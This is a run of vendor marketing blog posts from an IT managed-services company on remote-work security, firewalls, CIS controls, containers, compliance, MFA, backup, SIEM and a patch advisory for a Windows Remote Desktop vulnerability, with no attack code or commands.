If you’re looking to increase productivity and protection for your remote employees, we can help with a scalable and integrated security solution that delivers the strength and breadth of Cisco’s security approach with the power of Cisco Duo, AnyConnect, Umbrella and AMP for Endpoints.

As today’s IT teams are scrambling to figure out the logistics of helping their coworkers be productive from their home offices, it’s important to remember that security can’t be an afterthought. Enabling employees to work remote has only broadened the landscape for attackers, giving them even more opportunity to find a way into your organization.

As OneNeck CISO, Katie McCullough put it, “Cybercriminals are opportunists, and they know it’s a confusing time for everybody, that people are looking for information through all means possible. They also know companies are having to react quickly and may have unintended consequences for the configurations they put in place. Our boundaries to our corporate networks are expanding with so much work from home. Now more than ever security must be front and center.”

So, what is an IT leader to do to keep your workforce safe, no matter where they might be sitting? I sat down Katie last week as she sat in her own home to get her perspective on some basic steps that will help keep the attackers at bay.

The impact the pandemic is having on IT security…

Question 1: In light of the current pandemic, what are you seeing as the impact it’s having on the security environment, and how is this being exploited by attackers?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791348218′, style=” %}

How to keep your workers and data safe during a time of crisis…

Question 2: They say many devices, many risks, and we’ve got a lot of people in the remote workforce these days. What recommendations would you have for IT leaders to keep their teams safe as they’re remote?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791348206′, style=” %}

Question 3: It’s a known fact that end users pose the greatest risk to today’s organization. What recommendations do you have to mitigate this risk with a remote workforce?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791348139′, style=” %}

Question 4: I’ve heard you say many times over the past several years that one of the most critical aspects of data security is a simple one – regular patching. How are customers dealing with patching during this time?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791230724′, style=” %}

Question 5: One of the Critical Security Controls we often reference is around privileged account access. I’d imagine this is a key consideration during this time?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791294908′, style=” %}

Question 6: The OneNeck workforce is no exception during this time, as we’re all working remote right now. However, we still have a lot of engineers out there in the field working around the clock to help customers adapt to a remote workforce. What kinds of security services can we currently offer our customers to help them with these remote workforce challenges?

{% video_player “embed_player” overrideable=False, type=’scriptV4′, hide_playlist=True, viral_sharing=False, embed_button=False, width=’1280′, height=’720′, player_id=’27791230695′, style=” %}

In Summary

Now more than ever, we want our customers to know we’re here to help. Whether you need help implementing multi-factor authentication (MFA), encrypted connections, help ensuring proper email configurations or web safeguards, or if the worst happens and you need help with incident response – we are here to help.

We may be working in isolation, but it’s people and interaction that powers business. And we’re here to help keep your remote workforce interactions safe.

Keep moving forward. We got your back.

Long ago, in a land far away, there used to be a network perimeter. Those were the good old days where the network perimeter was the all-encompassing traffic control point, and where traffic was all funneled through a single point, no matter where it came from. But the cloud changed everything by decentralizing the network, making the perimeter vaporize, and giving IT many a sleepless night.

OneNeck Security Practice Director, Nick Santilli, describes the situation like this. “The largest cybersecurity threat still revolves around end users. As technology has evolved, we now have our phones, our tablets – we can work from anywhere on just about any device. And so, the security perimeter has expanded from being just at an office or company location to Starbucks or the movie theater, or even a beach – it’s wherever I am with my device.”

So, with the lack of one point of protection, today’s security teams are having to adapt to protecting multiple points (aka micro-perimeters) across a complex and dispersed environment. And just as IT is evolving their approach, traditional firewalls are evolving too and being replaced by a mixture of physical and virtual appliances, some embedded into the network while others are delivered as a service, are host-based or included with public cloud environments.

What Should I Look for in a Next-gen Firewall?

While threats continue to get more complex, many organizations are still using yesterday’s firewall. So, what should you consider when updating your firewall technology? Cisco lays out these five tips when choosing your next-gen firewall…

• Does it deliver breach prevention and advanced security? Clearly, breach prevention is a firewall’s primary job, but it also should quickly detect a breach should malware make its way inside.
• Does it give you visibility across the network? The first rule of detection is being able to see what’s out there. So your firewall should give you a holistic view and contextual awareness.
• Does it come with flexible management and deployment options? A firewall does no good if it’s too complex to deploy, not easily managed, and cannot be customized to meet your environment’s unique needs, making this a critical consideration.
• Does it detect threats fast enough to mitigate risk? With many of today’s high-profile breaches, it’s discovered later that they’ve been in their network for 100+ days, which is truly terrifying to any security professional. Speed to detection is a must in a modern firewall.
• Does it play well with others? Like any component of a solid security strategy, it has to be integrated with other security components to truly be effective. The automated sharing of threat information, event data, policy and contextual information is what leads to a solution that can secure an environment across multiple points.

The Network Security Game is Changing

Network security in general is becoming more complex on a daily basis, and this requires new strategies to keep the network safe from attack. Point tools, manual processes and lack of qualified staff are only making it harder on today’s CISO to stay ahead of threats. But with integrated technology, consistent network security policies automation, there is hope. Interested in learning more? Check out this informative ESG research report, Navigating Network Security Complexity.

You’re Not Alone.

Still not sure where to start? At OneNeck, we recognize that organizations often need support evolving their security programs, but they don’t have unlimited resources — or in many cases, a chief information security officer (CISO) — to accomplish this important goal. To address this gap, we offer our Virtual CISO service to provide you with on-demand strategic and operational support to meet your unique security needs, without the time delays and high cost of hiring a full-time security expert.

“We stay up to date on the latest security threats, so you don’t have to,” says OneNeck’s CISO, Katie McCullough. “If cybersecurity strategy and risk assessments are a core competency of yours, that’s great. But if not, we can stand in the gap and help you create a security program that accomplishes what you need, without over-engineering systems or processes.”

So, hang in there. You’re not alone. We’re here to help, wherever you are in your security journey.

For a long time, security initiatives have been driven by compliance mandates and a healthy dose of fear. But as threats continue to become more sophisticated, so must our efforts in thwarting them. This is why aligning with best practices is a great place to start, specifically the Center for Internet Security (CIS) Top 20 Critical Security Controls which was developed by a global group of security experts who continue to finetune them every year.

The 20 critical controls are divided into three categories: Basic, Foundational, and Organizational.

• Basic controls (1–6) are the must-have measures for the most basic defense readiness.
• Foundational controls (7–16) are a level beyond the basic controls.
• Organizational controls (17–20) focus more on people and processes.

The CIS further outlines in the CIS Controls v7.1 that an effective approach to cybersecurity can be approached with these steps:

• Offense informs defense: Use knowledge of actual attacks that have compromised systems to provide the foundation to continually learn from these events to build effective, practical defenses. Include only those controls that can be shown to stop known real-world attacks.
• Prioritization: Invest first in Controls that will provide the greatest risk reduction and protection against the most dangerous threat actors and that can be feasibly implemented in your computing environment.
• Measurements and Metrics: Establish common metrics to provide a shared language for executives, IT specialists, auditors, and security officials to measure the effectiveness of security measures within an organization so that required adjustments can be identified and implemented quickly.
• Continuous diagnostics and mitigation: Carry out continuous measurement to test and validate the effectiveness of current security measures and to help drive the priority of next steps.
• Automation: Automate defenses so that organizations can achieve reliable, scalable, and continuous measurements of their adherence to the Controls and related metrics.

It’s Time to Move to a Risk Management Approach to Security

At OneNeck, we believe that no matter where you are in your security strategy execution, the CIS controls provide prioritized, actionable steps to define and implement a security strategy. While there’s no one-size-fits-all approach to security, today’s organizations can lower the risk of a breach by changing their approach from strictly meeting compliance mandates to a risk management approach that uses practical and proven best practices.

OneNeck CISO, Katie McCullough, puts it like this… “Customers don’t have unlimited spend to go after security. So, at OneNeck, we work with our customers from a risk management perspective. What are their biggest risks? How do we leverage the investments they’ve already made? And how do we maximize their budget? Because the answer isn’t always buying a new security product. It might be microsegmentation of your applications. So, we’re not here to sell them a security product. We are here to help them define and implement risk management for their particular needs.”

In addition to guiding our customers with CSC best practices, internally at OneNeck, we establish practices in alignment with the critical security controls. We follow the advice and recommendations we give our customers, and as an experienced Managed Services Provider (MSP), we’ve seen firsthand how alignment with proven best practices is key in preventing attacks.

If you’re still not sure where to start when assessing your risk, we’d be happy to discuss your options. With the help of our security team, you don’t have to go it alone. Using the CIS 20 Controls as a benchmark, we can help identify the security risks unique to your business, develop a prioritized plan to mitigate risk and assist you in implementing a plan that keeps you safe from current and future attacks.

Security is intrinsic to our services (for all customers) and organization (all the way to the president and CEO of our parent company TDS Inc.). It’s part of every service we develop—from start to finish. Additionally, we leverage the Critical Security Controls (CSC), outlined by the Center for Internet Security (CIS), to complete our annual security assessments and third party audits.

The Critical Security Controls provide a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. In particular, the first six controls (referred to as the Basic Control set, see below) focus on cybersecurity “hygiene.” Studies show that implementation of these first six CIS Controls provides an effective defense against about 85 percent of the most common cyberattacks.

The OneNeck Security team focuses on providing timely input into developing new services, securing current IT infrastructure and systems so customers can rest assured we are ready and able to meet demands for secure services.

Internally, we establish practices in alignment with the critical security controls. It’s important we follow the advice and recommendations we give customers in order to demonstrate quick and effective ways we’re prepared to address aspects of the Critical Security Controls.

Customers count on us to have a rigorous security framework in place and to submit to outside resources to audit our work. Having third-party vendors perform internal audits (just like we do for SSAE, HIPPA, etc.), provides verification we have the evidence in place we claim to, therefore, avoiding potential bias.

To begin assessing the broad scope of security and compliance needs your business faces, our virtual Chief Information Security Officer (vCISO) service can help. With the help of our have team, comprised of security experts who stay current on emerging threats, you can bypass the hassle of hiring an in-house CISO and immediately bring in the security leadership you need to assess and improve your overall security posture.

Although containers aren’t new (been built into Linux for 10+ years and been available in FreeBSD, AIX and Solaris), containers seem to be all the rage, and for good reason. The agility containers can bring to an IT team alone make them appealing, but add in the security benefits that the self-contained nature of containers brings, they seem like a no brainer. But even with numerous benefits, there is also a lot of confusion about what they really are and what is the best-fit scenario. So, we thought we’d break it down…

First and foremost, are containers and VMs the same thing?

Quite simply, no. It is a very common misconception that containers and virtual machines (VMs) are interchangeable, or at least similar, but they are not. So, let’s start by defining each…

VMs are:

• As server processing power and capacity has increased, applications could not take advantage of this, so virtualization technology was created to allow for multiple “virtual computers” to be run on a single piece of bare metal hardware.
• A “hypervisor” (or a VM) manager creates and runs VMs and sits between the hardware and the VM.
• A single server can host multiple VMs. A Windows Server VM and a Linux VM can run side by side on the same physical machine.
• Each VM has its own operating system, libraries and applications.
• VMs can be gigabytes in size.
• VMs can consolidate multiple applications onto a single system with heterogeneous operating systems.
• VMs primary goal is to increase the utilization of the underlying physical machine.

Containers are:

• Containers are pieces of software that sit on top of the physical server AND its host OS (Linux or Windows). The OS kernel is shared across containers. Containers may also share common frameworks and libraries (e.g. .NET, JVM). In other words, the container has the entire runtime environment, minus the host OS.
• Containers are light, usually megabytes in size, where VMs are often gigabytes in size.
• Containers are good for taking a monolithic application that would require purchase of new hardware or configuration of a new VM and allowing it to scale on existing deployed VMs.
• Containers allow software to run reliably with minimal changes when moved from one computing environment to another, such as moving a container from an on-premises environment into a public cloud.
• In this figure, App1, App2, App3 could be monolithic applications, 3-tier applications or microservices. Notice a single OS which is then shared across the containers. Containers primary goal is consistency of the software environment regardless of where it is physically residing.

What are the benefits of containers?

There are very clear benefits that come with the adoption of containers:

• Containers are only tens of megabytes in size verses a VM that would be gigabytes in size.
• VMs take minutes to boot up the operating system and then start an application, while containerized applications start almost instantly. At scale, this allows for “just-in-time” creation of multiple instances of an application.
• Containers are more modular. Applications can be split into modules and deployed as microservices (e.g. front end, business layer and data layer would each be their own modules)
• Containers allow enterprises to deploy and scale existing monolithic applications without the need to procure new hardware and/or new VMs. In many organizations, it takes weeks/months to purchase new hardware or deploy a new VM into their environment, where containers allow for a much shorter deployment/update cycle.
• Containers and Container Orchestrators allow for a smoother and more efficient DevOps Practice by helping to enforce consistent environments.
• Containers allow for less effort to break apart monolithic applications and convert them to a microservices architecture.
• Overall, containers enable a much more agile software development lifecycle.

So, what are my options in containers and orchestrators?

Container Orchestrators (aka container management) provide tools to allow for deployment, scaling, availability and management of containers, both on-premises and in public/private clouds. They’re essentially a manager of your containers across multiple physical environments. The current most popular ones are:

• Docker – Open Source, most popular
• Apache Mesos – Open Source, includes orchestration
• Kubernetes – Open Source, most popular container orchestrator
• Red Hat Open Shift – On-premises private platform as a service for RHEL

All support the Open Container Initiative (OCI) under the Linux Foundation. This is important because all major providers are members of OCI/Linux Foundation.

In addition, Microsoft Azure has some excellent container service offerings:

• Azure Container Instances – Create a container instance by pointing to your Docker Image in Docker Container Registry. Essentially, containers on-demand.
• Azure Web App for Containers – Like Azure App Services, but instead of publishing your code directly into Azure you point the App Service to your Container in the Docker Container Registry
• Azure Kubernetes Service (AKS) – Fully managed service for deploying and managing container applications. Provides a “serverless” experience, integrated CI/CD and enterprise grade security.
• Azure Service Fabric – Native Azure Microservices using container images for both Windows and Linux
• Azure Batch – High Performance/High Scale computing with containers including job scheduling
• Azure Container Registry – Store and manage container images across all types of Azure deployments

So, why don’t we move everything into containers?

Containers can run all sorts of applications, but because they are so different from VMs, a lot of the older software that many enterprises are still running won’t translate to this model. However, VMs can be used to move older applications into a cloud service. So even though containers have their benefits, VMs still do too. It really boils down to… it depends…

————

Want to learn more? Download this informative eBook from our partner, HPE, and learn why container technology is a critical piece of IT modernization solutions that will drive digital transformation, hybrid environment adoption and hyper-convergence.

DOWNLOAD NOW

Topic: Containers vs vms

In its simplest form, compliance is about setting rules and following them, every time. No wavering, no audible—everyone simply follows the rules—every time. Seems easy, but it’s not always.

There are many reasons rules are broken (e.g., not paying attention, not listening, forgetting there were rules, etc.). The reason isn’t really that important. What matters is what transpires when the rules aren’t followed—compliance is directly impacted. After all, compliance is all about executing on processes, training, documenting and continuous inspection/improvement–every single touch or transaction!

To verify our company is following the rules, we invite third-party vendors to audit our processes annually.

These audits* include HIPAA and HITECH examinations; ISO/IEC 27001:2013 certification; SSAE 18 examinations; and PCI DSS validation. In addition, the Security and Compliance team continuously monitors for new regulations and creates process to comply with them (e.g., GDPR, California Privacy Act, etc.) and performs client-specific audits, such as the NIST SP 800-171.

Every audit is critical and serves a specific niche or need. They include a breadth of frameworks and wide-range of industries and geography. And, there’s often a great degree of overlap with industry-specific audits that our clients must demonstrate compliance with. Therefore, once we scrutinize the scope of the third-party audits we submit to and the scope of the client’s audit requirements, we often find our audits completely fulfill the industry-specific obligations.

For example, in a recent conversation, a potential client in the mortgage/banking industry referenced needing a partner that could demonstrate FDIC compliance. While OneNeck doesn’t specifically undertake FDIC compliance auditing, while reviewing the FDIC requirements, we demonstrated how our SOC1 and SOC2 attestations (available with an NDA) and ISO/IEC 27001:2013 certification fully meet—and in some cases, exceeded—controls outlined by the FDIC adherence guidelines.

In other situations, clients need audit-verification of technical, physical management, administrative controls, including background checks and annual training. We’re able to validate we meet these requirements based on the annual audits we already participate in

In addition, for clients that leverage us for hosted and managed services or colocation, the compliance and audits directly apply to their IT environment. With these solutions, our experienced professionals will also help address all the technical measures our clients must comply with.

*Upon request, OneNeck can provide these with NDA

Topic: NIST framework cybersecurity

Do you ever feel that your non-IT co-workers are trying to thwart your security protocols – ignoring software update alerts, opening suspicious emails or not following password best practices? If it seems that way, it might be “security fatigue.”

A study from the National Institute of Standards and Technology (NIST) found that 63 percent of participants have experienced “security fatigue,” defined as “a weariness or reluctance to deal with computer security.” It’s not that hard to understand.

Technology users get tired and stressed out from the efforts of remembering multiple login credentials, PIN numbers and ever-changing security protocols. The result? Making poor decisions that could result in an intrusion, exposure of sensitive data, loss of reputation or even huge financial losses.

5 “Security Fatigue” Symptoms and Tips to Relieve Them

1. Reusing passwords. According to a BBC report, people need to remember an average of 22 separate passwords and change them periodically. Yet, 81% of users reuse the same password for different accounts and 36% reuse the password in more than 25% of their online accounts.
   Suggestion: Install a password manager that generates strong passwords, remembers them and stores them in a safe location. The user only needs to remember one set of master credentials, rather than dozens.
2. Falling prey to phishing. According to Dark Reading, 91% of cyberattacks start with a phishing email. Employees may not know the damage they can cause just by opening an email, downloading an attachment or clicking on a link.
   Suggestion: Proactive companies build a “cybersecurity culture,” in which every single technology user takes personal responsibility for his or her role in guarding against cyber intruders. The necessary ingredients – clear rules and expectations, regular training (and testing) and solid leadership from the C-suite.  
3. Not using secure connections. It happens all the time. More and more, people work from home or from a coffee shop, maybe using a personal laptop or another device. Unfortunately, they think it’s a nuisance to log into the VPN and connect over unsecured Wi-Fi (on an unsecured device).
   Suggestion: The fix may be as simple as putting a reminder on the device’s startup screen or setting electronic reminders, or possibly simplifying the procedure for users.
4. Not updating devices and software. Pop-ups about updating software are annoying, disturb workflow and can create anxiety. Time-crunched employees may also put off what they see as a “mundane” task (while you think of WannaCry).
   Suggestion: Security and IT staff should take control of updating as many devices and software as possible, including implementing patches, downloading malware databases and other risk-reducing tasks. 
5. Not reporting suspicious activities. What if an employee realizes that they have just been tricked by a phishing scam? They may fail to report the incident for fear they will be blamed or be disciplined.
   Suggestion: Employees should be encouraged to flag behaviors immediately, without fear of a punitive response. The organization should view human-error incidents as learning opportunities to educate users and to point IT toward potential procedural improvements.
6. Outsourcing cybersecurity functions. Given today’s increasingly complex and perilous threat landscape, limited resources and shortage of expertise, keeping up with cybersecurity needs can overwhelm the IT group.
   Suggestion: Consider partnering with a managed services providers (MSP) that specializes in cybersecurity. A security-focused MSP can successfully reduce security fatigue so that both IT and business employees will make better decisions when cybercriminals come to call.

Want to learn more about building a cybersecurity framework that will keep your business safe?

Download our white paper: A Framework for Cybersecurity and Compliance: What You Can Learn from NIST SP-800-171.

I need backup for Office 365? Isn’t it already included?  In short, no. The misconception that Microsoft fully backs up your data on your behalf is all too common.  To the contrary, Microsoft is primarily focused on managing the infrastructure and ensuring uptime; you are responsible for your data.

According to 451 Research, data backup remains one of the key principles in data protection for several reasons, and while SaaS vendors focus on providing infrastructure resiliency and application availability for their own platform, the traditional 3-2-1 backup rule still applies as a best practice for ensuring data protection and resilience.

Bottom line, businesses using Office 365 need to backup their data and here’s why:

Critical Reasons to Backup Office 365

Veeam, a data backup and recovery, data protection and data security company and OneNeck partner, surveyed hundreds of IT professionals across the globe who have migrated to Office 365, six vulnerabilities in data protection rose to the top in their findings:

1. Accidental Deletion- If you delete a user, whether you meant to or not, that deletion is replicated across the network, along with the deletion of their personal SharePoint site and their OneDrive data.
2. Retention Policy- Gaps & Confusion- Office 365 has limited backup and retention policies that can only fend off situational data loss and is not intended to be an all-encompassing backup solution.
3. Internal Security Threats- Businesses experience threats from the inside, and they are happening more often than you think. Organizations fall victim to threats posed by their very own employees, both intentionally and unintentionally.
4. External Security Threats- Malware and viruses, like ransomware, have done serious damage to organizations across the globe. Not only is company reputation at risk, but the privacy and security of internal and customer data as well.
5. Legal and Compliance Requirements- Legal requirements, compliance requirements and access regulations vary between industries and countries, but fines, penalties and legal disputes are three things you don’t have room for on your to-do list.
6. Managing Hybrid Deployments & Migrations to Office 365 – Organizations that adopt Office 365 typically need a window of time to serve as a transition window between on-premises Exchange and Office 365 Exchange Online. Some even leave a small portion of their legacy system in place to have added flexibility and additional control. These hybrid email deployments are common yet pose additional management challenges.

Comprehensive Backup from A Trusted Partner

We’ve worked with many organizations to safeguard their data with a flexible, secure and efficient cloud-based backup and recovery service your business can rely on.

OneNeck can enable and support your Office 365 backups helping to eliminate the risk of losing access and control over your Office 365 data.  Our backup solution give you the power to securely backup Office 365 and:

• Protect your Office 365 data from accidental deletion, security threats and retention policy gaps
• Quickly restore individual Office 365 email, files and sites with industry-leading recovery flexibility
• Meet legal and compliance requirements with efficient eDiscovery of Office 365 items

Let us help you gain complete access and control of your Office 365 data and avoid the unnecessary risks of data loss. Contact us today!

Topic: Microsoft Office 365

 Finding a mechanism to collect, store and analyze security only data is relatively simple. There is no shortage of options for storing data. Collecting all security relevant data and turning all that data into actionable intelligence, however, is a whole other matter.

According to splunk, an analytics-driven security solution provider, many enterprise IT organizations that invested in security event information management (SIEM) platforms have discovered this fundamental truth the hard way. The data available to analyze is based only on security events. That makes it difficult to correlate security events against what’s occurring across the rest of an IT environment. When there’s an issue, investigating a security event takes precious time most IT organizations can’t afford. In addition, the SIEM system can’t keep pace with the rate at which security events need to be investigated.

Not All SIEMS Are Created Equal

As noted above,  a legacy SIEM solution can’t keep pace with the rate at which security events need to be investigated.

splunk outlines some of the known issues with legacy SIEM solutions which include:

• Limited data ingestion capabilities

• Complex deployment and maintenance

• Inflexible search, correlation and visualization capabilities

• Lack of scalability

• Limited analytics capabilities

Enterprise IT requires wider and deeper insights to identify emerging threats and attacks to help eliminate so many of the manually-driven tasks that are weighing IT security pros down.  Enter an analytics-driven SIEM solution

Analytics-Driven SIEM

An analytics-driven SIEM will connect the dots faster to help predict patterns, identify suspicious behavior, and automate corrective actions in real time so that IT can respond quickly to incidents and damage can be avoided or limited. According to splunk, a modern, analytics-driven SIEM solution needs to have the following 7 capabilities:

The Advantage of a Managed SIEM

OneNeck partners with the best, like splunk, to deliver solutions that can help optimize IT and enhance security.We can help you implement, monitor and maintain your SIEM solution.

And, our managed SIEM service offers scalable, real-time security monitoring and analysis to our customers to detect threats and meet compliance requirements

Speak with a OneNeck security specialist today about how our comprehensive approach to SIEM can protect your data and your business.

Creating a strong external security posture is critical. But what can businesses do to protect their data and environments?

Concerns about security are escalating. Nearly every day, new malicious attacks, Phishing attempts and malware are identified. In addition, new vulnerabilities, such as the exploitable vulnerability recently identified by Microsoft, continue to be discovered. It all leads to the same challenge: How do you create a strong security posture to protect your business?

Leveraging the Center for Internet Security’s (CIS) Critical Security Controls is a solid place to start and is part of the evaluation provided with OneNeck’s vCISO service. The controls—which OneNeck leverages to complete annual security assessments and third-party audits—are a series of cybersecurity actions prioritized by their criticality in preventing cyberattacks. In particular, the first six controls (referred to as the Basic Control set) focus on cybersecurity “hygiene.” Studies show that implementation of these first six CIS Controls can provide an effective defense against about 85 percent of the most common cyberattacks.

In addition to leveraging the CIS controls, using third-party penetration (pen) testers offers businesses a way to ensure the controls put in place are effective. OneNeck leverages third-party pen testers at least annually. A recent pen test revealed OneNeck has “Strong External Network Security Controls” in place and that our systems and services are well-patched and maintained.

In large part, this positive commentary is due to the fact that we scan our external facing services multiple times a month. We also perform detailed internal security scans, which provide a holistic understanding of the security of our environment. Don’t take our word for it though; contact your Account Executive to request a copy of our penetration test report.

Security Rating Services (SRS) reports are another tool many businesses rely on to evaluate the security practices put in place by potential IT partners. Generated by companies such as Bitsight and RiskRecon, the SRS reports are similar to a “credit score” in that the scores vary based on the data available. Instead of reporting on a provider’s full environment, SRS reports only include external facing data (e.g., web servers that face the internet). In fact, a provider’s internal practices are completely overlooked, primarily because the SRS aggregators don’t have access to a provider’s internal-facing data.

In addition, most SRS reports assess all IP addresses assigned to a company through ARIN. For a company like OneNeck, because we offer colocation services, we have IP addresses assigned to company-owned and controlled devices AND customer-owned and customer-managed devices. In these instances, where the customer owns and manages their devices, OneNeck does not have authority to access or make changes to devices. This scenario became very evident recently. An SRS report identified more than 2,000 IP addresses (affiliated with OneNeck) had been scanned; however, nearly two-thirds belonged to customers in which OneNeck did not have access or authority to make changes to their environment. Of the OneNeck controlled devices, all of the vulnerabilities had been previously discovered through our own internal scanning and being actively addressed or retired. 

The bottom-line: Creating a strong external security posture is critical. There are many tools and steps businesses can leverage to protect their data and environments. As, always, it’s important to understand the details, verify the reports, and ensure equivalent data is being compared.

——–

Want to learn more? Check out additional security resources
here
.

Are you running an older version of Windows and not current with your patch management? If so, you need to be aware of a recent exploitable vulnerability that just hit the news this week. Here’s what you need to know…

Microsoft released fixes for a critical Remote Code Execution vulnerability, CVE-2019-0708, in Remote Desktop Services – formerly known as Terminal Services – that affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction.

Simon Pope, director of incident response for the Microsoft Security Response Center wrote, ” In other words, the vulnerability is ‘wormable’ – meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer.”  He also stated, “While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware,”

Because of the severity of the vulnerability Microsoft is providing a patch for out of support systems, such as Windows XP and Windows 2003.

Customers running Windows 8 and Windows 10 are not affected by this vulnerability.

Vulnerable systems include:

• Windows XP
• Windows 2003
• Windows 7
• Windows 2008 R2 and Windows 2008

If you’re still unsure that you’re protected, OneNeck’s security experts are here to help.

References

• https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
• https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/
• https://blog.talosintelligence.com/2019/05/MS-Patch-Tuesday-May-2019.html

It’s no secret… security attacks are the rise:

• Within the past year, leading global companies have seen sales and revenue impacts as high as $300 million due to malware-based cyberattacks.
• By 2021, at least one company will publicly acknowledge a $1 billion revenue impact from a business outage resulting from a malware/ransomware attack.
• Mobile malware is more than doubling each year, reaching levels where it can no longer be ignored. By 2019, mobile malware will amount to one-third of total malware reported in standard tests, up from 7.5% today.

To combat cybercrime, the Federal Government has released numerous compliance regulations designed to protect data and systems including Federal Information Security Modernization Act (FISMA) and Health Insurance Portability and Accountability Act (HIPAA).

Further, many industries also define requirements. Adherence to these regulations and industry standards such as Payment Card Industry compliance (PCI), is a requirement for doing business in a global market.

The result, blurred lines between security vs compliance.  This article aims to clear up the misconceptions between the two and provide tips to help your organization strike a balance between being compliant and being secure.

Clearing Up the Misconceptions

Security Compliance

Many organizations have the mindset that being compliant makes them fundamentally secure. Unfortunately, that is not the case. Compliance regulations are not security programs. Compliance demonstrates how well your organization meets security-related requirements of specific regulatory standards like PCI or HIPAA.  Security on the other hand, is a collection of controls designed to mitigate risk and protect your data and applications from threats.

You can be compliant, but that doesn’t mean you’re secure.

“Checkbox Mentality”

Relying on merely checking the box and being compliant will not keep you secure and puts your business at serious risk. Why? Compliance mandates are general guidelines, but do not reflect what individual companies need in terms of security.

In addition, compliance requirements are mostly reactive versus proactive in nature, often changing slowly and predictably. The security/threat landscape however, is constantly evolving. As a result, many compliance mandates are a few steps behind the most current threats.

Compliance is a blueprint for my security strategy

Your security strategy should be built from the ground up, based on your unique needs and centered around security principles, rather than regulatory mandates. In addition, it should include considerations in regard to how your overall business views risk.

According to Jim Kennedy, contributing author at CSO magazine, many organizations are opting to define security policies based on regulatory requirements, however the result is that their security postures become very quickly out of date. Not only are regulations typically at least 24 months old by the time they are implemented, but a compliance-only approach provides hackers with an ‘access blueprint’ – as weaknesses in the security model that are not covered by regulation are clearly visible.

Finding Alignment

Addressing security vulnerabilities and the demands of regulatory compliance isn’t an easy feat. To truly protect sensitive data, both security and compliance are critical. Without a smart, thorough and active security program, coupled with a solid compliance plan, you’re at significant risk of being breached. And, while seemingly very different, security and compliance can work in harmony to achieve a common goal- ensuring the privacy and protection of your sensitive data.

A structured approach to security and compliance starts with understanding security, risk  and  requirements unique to your business and your industry, measured against defined areas for assessment

Katie McCullough, Chief Information Security Officer here at One Neck, outlined the following basic principles:

Document Your Processes

Documentation is a key element of compliance and security. If it’s not documented, then it’s not really happening. Neglecting to document guarantees that the security and compliance programs will never function in unison as one.

Train

Training your user base to adhere to security and compliance best practices is a must. Develop an awareness training program that provides users with education on policies and procedures.

Measure Effectiveness

Make sure you are measuring effectiveness of your security and compliance initiatives. Measure process performance and controls against your established guidelines.

Improve Processes

Implement a continuous improvement process. By leveraging the metrics obtained when measuring your performance, you can facilitate continuous improvement by applying corrective actions based on your observed measurements.

OneNeck Has You Covered

Clearly understanding where you are and what vulnerabilities exist can save significant time, money and distress down the road when under attack or trying to achieve compliance. Don’t go it alone. We’re here to help you stay safe from emerging risks that leave you exposed, while allowing you to maintain a balance of productivity and operational effectiveness.

For more information, read our Framework for Cybersecurity and Compliance white paper.

TeleSign research indicates that the majority of users use five or fewer passwords for all of their accounts. While it may seem efficient for password memory on your end, you could actually create a “domino effect” that allows hackers to take down multiple accounts by cracking one password.

There’s and easy more powerful defense out there… enter Multi-Factor Authentication (MFA)

What is MFA?

Multi-factor authentication is based on the concept of requiring multiple forms of identification. It stops easy access with stolen credentials by requiring a second level of authentication after the user enters their username and password.

You’ve probably used MFA before, even if you weren’t aware of it. If a website has ever sent a numeric code to your phone for you to enter to gain access, for instance, you’ve completed a multi-factor transaction.

How Does MFA Work?

According to Duo, typically MFA transaction happens like this:

1. The user logs in to the website or service with their username and password.
2. The password is validated by an authentication server, and if correct, the user becomes eligible for the second factor.
3. The authentication server sends a unique code to the user’s second-factor device.
4. The user confirms their identity by approving the additional authentication from their second-factor device. 

While the basic processes behind multi-factor authentication are generally the same across providers, there are many different ways to implement it, and not all methods are created equal.

Benefits of MFA

MFA can:

• Mitigate threats by providing an additional layer of protection
• Decrease the chance of end user identities (and, subsequently, their IT resources) becoming compromised
• Enable compliance with industry regulations such as PCI and HIPPA for privileged access to sensitive data

 A Trusted Partner 

 With more and more users accessing their sensitive corporate accounts online, organizations are struggling to keep their sensitive information safe. Multi-factor authentication provides proven protection in a world of increasing threats.  As a managed IT security services provider, OneNeck^® IT Solutions is here to guide you, using a multi-layered approach, providing protection at every layer: from the DNS layer, to the network, to the endpoint. Contact us today to learn how to better safeguard your company’s valuable data.  

Topic: NIST Framework Cybersecurity

How can a CIO be confident that IT will perform 24/7/365?

 According to Zerto, in today’s always-on, information-driven organizations, IT resilience depends completely on IT infrastructures that are up and running 24/7. The costs of downtime are huge and data loss can put a company out of business. Data loss is not only caused by natural disasters, power outages, hardware failure and user errors, but more and more by software problems and cybersecurity related disasters.

Therefore, thorough security and business continuity strategies are crucial for modern businesses, minimizing data loss and downtime. Especially now, as data centers become more and more software defined, these private, hybrid and public clouds become more vulnerable to these kinds of threats.

Download Zerto’s Disaster Recovery Guide: Primer for CIOs for insights into the challenges, needs, strategies, and available solutions for disaster recovery, especially in modern, virtualized environments and the public cloud.

A Strategic, Trusted Partner

OneNeck is here to help you maximize uptime, become more efficient and be able to adopt and accelerate with new technologies such as hybrid clouds, while running at the speed of business. We start by conducting a disaster recovery assessment to ensure a planned approach to Disaster Recovery (DR). Taking the time upfront, before implementation, to determine what’s critical to your business and your customers, ensures that you deliver on your commitments no matter what. Then, we tailor our solutions to your situation.  So, breathe easy – we got this. Execute your disaster recovery strategy with OneNeck today.

